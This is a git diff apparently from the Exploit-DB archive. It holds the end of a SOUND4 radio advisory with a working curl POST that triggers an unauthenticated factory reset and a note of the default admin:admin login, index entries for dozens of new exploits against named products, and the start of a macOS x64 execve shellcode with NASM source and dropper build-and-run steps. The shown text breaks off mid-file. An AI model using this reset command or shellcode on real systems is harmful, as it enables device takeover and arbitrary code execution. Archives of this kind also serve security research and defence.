affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The device allows unauthenticated attackers to visit the unprotected +/usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factory +default configuration. Once a POST request is made, the device will reboot +with its default settings allowing the attacker to bypass authentication +and take full control of the system. + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5742 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php + + +26.09.2022 + +-- + + +> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \ +> sleep 120 + +#login admin:admin \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bad9708e7..185964144 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -924,6 +924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - X-Path Injection",2018-02-16,"Shayan S",webapps,asp,443,2018-02-16,2018-02-28,1,CVE-2016-6272,,,,, 34864,exploits/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",webapps,asp,443,2014-10-02,2014-10-02,0,CVE-2014-4312;OSVDB-114150;OSVDB-112471;OSVDB-112470;OSVDB-112469;OSVDB-112467;OSVDB-112466;OSVDB-112465;CVE-2014-4311;OSVDB-112464,,,,, 27844,exploits/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - 'Moreinfo.asp' Cross-Site Scripting",2006-05-09,Dj_Eyes,webapps,asp,,2006-05-09,2013-08-25,1,CVE-2006-2306;OSVDB-25330,,,,,https://www.securityfocus.com/bid/17907/info +51154,exploits/asp/webapps/51154.txt,"EQ Enterprise management system v2.2.0 - SQL Injection",2023-03-31,TLF,webapps,asp,,2023-03-31,2023-03-31,0,CVE-2022-45297,,,,, 17375,exploits/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,webapps,asp,,2011-06-09,2011-06-09,1,,,,,, 7801,exploits/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,webapps,asp,,2009-01-15,,1,OSVDB-51456;CVE-2009-0252,,,,, 11023,exploits/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,webapps,asp,,2010-01-05,,1,OSVDB-61596;CVE-2010-1064,,,,, @@ -3142,6 +3143,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware,,2019-04-22,2019-04-22,0,CVE-2019-7181,,,,, 40985,exploits/hardware/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,hardware,,2017-01-02,2018-02-07,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2017-01-02-at-91824-am.png,,https://www.securityfocus.com/archive/1/539978 41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS Devices - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,,2017-02-01,2022-11-21,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/QNAP%20NVR%20NAS%20Heap%20-%20Stack%20-%20Heap%20Feng%20Shui%20overflow%20and%20%22Heack%20Combo%22%20to%20pwn.txt +51157,exploits/hardware/dos/51157.py,"qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)",2023-03-31,"Krzysztof Burghardt",dos,hardware,,2023-03-31,2023-03-31,0,CVE-2022-46770,,,,, 43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware,,2018-01-23,2018-01-23,0,CVE-2018-5319,,,,, 11597,exploits/hardware/dos/11597.py,"RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)",2010-02-28,ad0nis,dos,hardware,,2010-02-27,,0,CVE-2010-1544;OSVDB-62713,,,,, 23672,exploits/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Denial of Service",2004-02-09,"Bruno Morisson",dos,hardware,,2004-02-09,2012-12-25,1,CVE-2004-2078;OSVDB-3891,,,,,https://www.securityfocus.com/bid/9618/info @@ -3302,6 +3304,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9066,exploits/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure",2009-07-01,Septemb0x,remote,hardware,,2009-06-30,,1,OSVDB-55548;CVE-2009-2306,,,,, 32440,exploits/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation / Code Execution (Metasploit)",2014-03-22,Metasploit,remote,hardware,22,2014-03-22,2014-03-22,1,OSVDB-104652,"Metasploit Framework (MSF)",,,, 50133,exploits/hardware/remote/50133.py,"Aruba Instant 8.7.1.0 - Arbitrary File Modification",2021-07-16,Gr33nh4t,remote,hardware,,2021-07-16,2021-07-16,0,CVE-2021-25155,,,,, +51155,exploits/hardware/remote/51155.sh,"ASKEY RTF3505VW-N1 - Privilege Escalation",2023-03-31,"Leonardo Nicolas Servalli",remote,hardware,,2023-03-31,2023-03-31,0,,,,,, 8846,exploits/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,remote,hardware,,2009-05-31,,1,OSVDB-54895,,,,, 42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,, 36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info @@ -14336,6 +14339,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info 28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info 28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info +51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,, 41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip, 17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,, 9387,exploits/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",webapps,php,,2009-08-06,,1,CVE-2009-5003;OSVDB-68191,,,,, @@ -14743,6 +14747,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28800,exploits/php/webapps/28800.txt,"Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php,,2006-10-13,2017-10-13,1,CVE-2006-6592;OSVDB-32431,,,,,https://www.securityfocus.com/bid/20512/info 12729,exploits/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,webapps,php,,2010-05-23,,1,,,,,, 48746,exploits/php/webapps/48746.rb,"Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass",2020-08-17,"Alexandre ZANNI",webapps,php,,2020-08-17,2020-11-13,1,CVE-2019-17240,,,,, +51160,exploits/php/webapps/51160.txt,"Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)",2023-03-31,"Alperen Ergel",webapps,php,,2023-03-31,2023-03-31,0,,,,,, 50529,exploits/php/webapps/50529.txt,"Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)",2021-11-17,Vasu,webapps,php,,2021-11-17,2021-11-17,0,CVE-2021-35323,,,,http://www.exploit-db.combludit-3-13-1.zip, 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,, 48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,, @@ -15026,6 +15031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,, 33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz, 35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz, +51166,exploits/php/webapps/51166.py,"Cacti v1.2.22 - Remote Command Execution (RCE)",2023-03-31,"Riadh Bouchahoua",webapps,php,,2023-03-31,2023-03-31,0,CVE-2022-46169,,,,, 48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,,2020-03-02,2020-03-02,0,,,,,, 7480,exploits/php/webapps/7480.txt,"CadeNix - SQL Injection",2008-12-15,HaCkeR_EgY,webapps,php,,2008-12-14,2017-01-05,1,OSVDB-51063;CVE-2008-5777,,,,, 3237,exploits/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,webapps,php,,2007-01-30,,1,OSVDB-33631;CVE-2007-0677,,,,, @@ -21712,6 +21718,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3113,exploits/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,webapps,php,,2007-01-09,2016-11-16,1,OSVDB-33459;CVE-2007-0232,,,,, 6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,webapps,php,,2008-07-11,2016-12-13,1,OSVDB-47025;CVE-2008-7301;OSVDB-47024;CVE-2008-3193;OSVDB-47023;CVE-2008-3192,,,,, 11445,exploits/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,webapps,php,,2010-02-13,,1,OSVDB-62329;CVE-2010-0691,,,,, +51165,exploits/php/webapps/51165.txt,"Judging Management System v1.0 - Authentication Bypass",2023-03-31,"Angelo Pio Amirante",webapps,php,,2023-03-31,2023-03-31,0,,,,,, +51164,exploits/php/webapps/51164.py,"Judging Management System v1.0 - Remote Code Execution (RCE)",2023-03-31,"Angelo Pio Amirante",webapps,php,,2023-03-31,2023-03-31,0,,,,,, 3799,exploits/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,webapps,php,,2007-04-24,2016-09-30,1,OSVDB-35387;CVE-2007-2324,,,,http://www.exploit-db.comjulma.zip, 2628,exploits/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,webapps,php,,2006-10-22,,1,OSVDB-35737;CVE-2006-6635,,,,, 29544,exploits/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",webapps,php,,2013-11-25,2013-11-25,0,CVE-2013-6618;OSVDB-92227,,,,, @@ -28262,6 +28270,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,"Murat ŞEKER",webapps,php,,2021-03-15,2021-03-15,0,,,,,, 49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload",2021-04-21,"Vishwaraj Bhattrai",webapps,php,,2021-04-21,2021-10-28,0,,,,,, 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)",2021-03-18,"Murat ŞEKER",webapps,php,,2021-03-18,2021-10-28,0,,,,,, +51163,exploits/php/webapps/51163.py,"rconfig 3.9.7 - Sql Injection (Authenticated)",2023-03-31,azhen,webapps,php,,2023-03-31,2023-03-31,0,CVE-2022-45030,,,,, 48207,exploits/php/webapps/48207.py,"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution",2020-03-12,"Engin Demirbilek",webapps,php,,2020-03-12,2020-03-12,0,CVE-2020-10221,,,,, 9552,exploits/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php?op' SQL Injection",2009-08-31,Mr.SQL,webapps,php,,2009-08-30,,1,,,,,, 11943,exploits/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,webapps,php,,2010-03-28,,1,,,,,, @@ -28850,6 +28859,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php,,2011-05-03,2015-01-05,1,,,,,,https://www.securityfocus.com/bid/47701/info 34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php,,2010-06-15,2014-07-23,1,,,,,, 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,,2020-05-13,2020-05-13,0,,,,,, +51161,exploits/php/webapps/51161.txt,"Senayan Library Management System v9.0.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,, 51120,exploits/php/webapps/51120.txt,"Senayan Library Management System v9.5.0 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, 2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,webapps,php,,2006-08-02,2016-08-31,1,OSVDB-27782,,,,http://www.exploit-db.comsendcard_3-4-0.tar.gz, 3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php,,2007-04-30,2016-09-30,1,OSVDB-35738;CVE-2007-2471,,,,http://www.exploit-db.comsendcard_3-4-1.tar.gz, @@ -29697,6 +29707,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,, 34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info 35522,exploits/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",webapps,php,,2011-03-29,2014-12-15,1,,,,,,https://www.securityfocus.com/bid/47077/info +51162,exploits/php/webapps/51162.txt,"Spitfire CMS 1.0.475 - PHP Object Injection",2023-03-31,LiquidWorm,webapps,php,,2023-03-31,2023-03-31,0,,,,,, 27601,exploits/php/webapps/27601.txt,"Spitfire CMS 1.1.4 - Cross-Site Request Forgery",2013-08-15,"Yashar shahinzadeh",webapps,php,,2013-08-15,2013-08-15,0,OSVDB-66409,,,,, 32554,exploits/php/webapps/32554.txt,"SpitFire Photo Pro - 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",webapps,php,,2008-10-31,2014-03-27,1,OSVDB-106996,,,,,https://www.securityfocus.com/bid/32012/info 21514,exploits/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,webapps,php,,2002-06-06,2012-09-24,1,CVE-2002-0959;OSVDB-9233,,,,,https://www.securityfocus.com/bid/4953/info @@ -30216,6 +30227,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 36489,exploits/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Cross-Site Scripting",2012-01-04,"Jonathan Claudius",webapps,php,,2012-01-04,2015-03-25,1,CVE-2011-5019;OSVDB-78133,,,,,https://www.securityfocus.com/bid/51254/info 44277,exploits/php/webapps/44277.txt,"TextPattern 4.6.2 - 'qty' SQL Injection",2018-03-12,"Manuel García Cárdenas",webapps,php,,2018-03-12,2018-03-12,0,CVE-2018-7474,,,,, 49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,,2021-03-04,2021-03-04,0,,,,,, +51176,exploits/php/webapps/51176.txt,"Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)",2023-03-31,"Alperen Ergel",webapps,php,,2023-03-31,2023-03-31,0,,,,,, 14823,exploits/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,webapps,php,,2010-08-28,2010-08-28,0,CVE-2010-3205;OSVDB-67800,,,,http://www.exploit-db.comtextpattern-4.2.0.tar.gz, 48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,,2020-10-07,2020-10-07,0,,,,,, 48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php,,2020-10-19,2020-10-19,0,,,,,, @@ -32096,6 +32108,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49154,exploits/php/webapps/49154.py,"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution",2020-12-02,zetc0de,webapps,php,,2020-12-02,2021-04-21,0,CVE-2020-35313,,,,, 1982,exploits/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,webapps,php,,2006-07-03,,1,OSVDB-34426;CVE-2006-3422,,,,, 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,,2018-04-09,2018-04-09,0,,,,,, +51156,exploits/php/webapps/51156.txt,"WooCommerce v7.1.0 - Remote Code Execution(RCE)",2023-03-31,"Milad karimi",webapps,php,,2023-03-31,2023-03-31,0,,,,,, 12576,exploits/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,webapps,php,,2010-05-10,,1,,,,,, 50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,, 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,, @@ -39240,6 +39253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50764,exploits/windows/local/50764.txt,"Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,, 50690,exploits/windows/local/50690.txt,"CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path",2022-02-02,"Angel Canseco",local,windows,,2022-02-02,2022-02-02,0,,,,,, 47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,,2019-11-12,2019-11-12,0,,,,,, +51159,exploits/windows/local/51159.txt,"CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path",2023-03-31,"Damian Semon Jr",local,windows,,2023-03-31,2023-03-31,0,,,,,, 39594,exploits/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Local Stack Overflow",2016-03-22,"Charley Celice",local,windows,,2016-03-22,2016-03-23,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-03-23-at-150050.png,http://www.exploit-db.comCoolPlayer219_Bin.zip, 4839,exploits/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Local Stack Overflow",2008-01-05,Trancek,local,windows,,2008-01-04,2016-11-14,1,CVE-2006-6288,,,,http://www.exploit-db.comCoolPlayer217_Bin.zip, 6157,exploits/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",local,windows,,2008-07-28,2016-12-14,1,OSVDB-47194;CVE-2008-3408,,,,, @@ -40926,6 +40940,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8624,exploits/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)",2009-05-07,Stack,local,windows,,2009-05-06,,1,OSVDB-54562;CVE-2009-1643,,,,http://www.exploit-db.comsoritong10.exe, 44896,exploits/windows/local/44896.vb,"Soroush IM Desktop App 0.15 (beta) - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows,,2018-06-15,2018-06-19,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,http://www.exploit-db.comSoroush-0.15.0.exe, 45171,exploits/windows/local/45171.vb,"Soroush IM Desktop App 0.17.0 - Authentication Bypass",2018-08-09,VortexNeoX64,local,windows,,2018-08-09,2018-09-04,0,,,,,http://www.exploit-db.comSoroushSetup0.17.0(1).exe, +51170,exploits/windows/local/51170.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,, +51169,exploits/windows/local/51169.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,, +51171,exploits/windows/local/51171.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,, +51168,exploits/windows/local/51168.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,, +51172,exploits/windows/local/51172.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,, +51173,exploits/windows/local/51173.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,, +51174,exploits/windows/local/51174.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,, +51167,exploits/windows/local/51167.txt,"SOUND4 Server Service 4.1.102 - Local Privilege Escalation",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,, 9970,exploits/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Local Privilege Escalation",2009-10-20,bellick,local,windows,,2009-10-19,,1,,,,,, 11264,exploits/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,local,windows,,2010-01-25,2010-06-27,0,CVE-2009-4606;OSVDB-59080,,,,http://www.exploit-db.comwebdrive.exe, 49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 51216d82f..06b6c2313 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -831,6 +831,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",,macos,31,2019-02-18,2019-05-23,0,,,,,, 46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",,macos,103,2019-02-18,2019-02-18,0,,,,,, 46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",,macos,119,2019-02-18,2019-05-23,0,,,,,, +51177,shellcodes/macos/51177.txt,"macOS/x64 - Execve Null-Free Shellcode",2023-03-31,boku,,macos,253,2023-03-31,2023-03-31,0,,,,,, 39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)",2016-06-06,odzhancode,,multiple,194,2016-06-16,2018-01-21,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png,, 13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,,multiple,38,2004-09-11,,1,,,,,, 13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",,multiple,99,2005-11-14,,1,,,,,, diff --git a/shellcodes/macos/51177.txt b/shellcodes/macos/51177.txt new file mode 100644 index 000000000..ae52076d1 --- /dev/null +++ b/shellcodes/macos/51177.txt @@ -0,0 +1,216 @@ +# Shellcode Title: macOS/x64 - Execve Null-Free Shellcode (253 Bytes) +# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7 +# Date: 12/20/2022 +# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64 +# Shellcode Description: +# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is within the shellcode. The shellcode finds the string in memory, copies the string to the stack, and then changes the string terminator to 0x00. +# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course! +# Compile & run: +# nasm -f macho64 execve.asm -o execve +# for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo +# # Add shellcode to dropper.c +# gcc dropper.c -o dropper +# sh-3.2$ pstree -p $(echo $$) | grep $$ +# \-+= 56862 bobby sh +# sh-3.2$ ./dropper +# [+] Shellcode Length: 253 Bytes +# [+] Copying shellcode from variable at 0x10e4fde00 to allocated RWX memory at 0x10e643000 +# [+] Executing shellcode at 0x10e643000 +# bobby$ pstree -p $(echo $$) | grep -B1 $$ +# \-+= 56862 bobby sh +# \-+= 57021 bobby (bash) + +bits 64 +global _main + +_main: + create_stackframe: + push rbp ; push current base pointer to the stack + mov rbp, rsp ; Set Base Stack Pointer for new Stack-Frame + sub rsp, 0x60 ; create space for string + mov [rbp-0x8], rsp ; Save destination string buffer address + jmp short lilypad_1 + +; char * string eggHunter(egg); +; RAX RDI +; description: starts searching for the supplied egg starting from the callers return address +eggHunter: + mov rcx, [rsp] ; start the egghunter from the caller function return address + hunt: + inc rcx ; move to the hunter to the next byte + cmp [rcx], di ; did we find the first egg? + jne hunt ; if not, continue hunt + + add cx, 0x2 ; move hunter to 2nd egg location + cmp [rcx], di ; did we find the second egg? + jne hunt ; if not, continue hunt + + add cx, 0x2 ; both eggs found! Move hunter +2 to return the start of buffer addr + xchg rax, rcx ; return start of string address + ret + +; int length strsize(&string, terminator); +; RAX RDI RSI +; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included. +strsize: + xor rax, rax ; clear register + xor rcx, rcx ; set the counter to zero + strsize_loop: + mov rcx, rdi ; start of string address + add rcx, rax 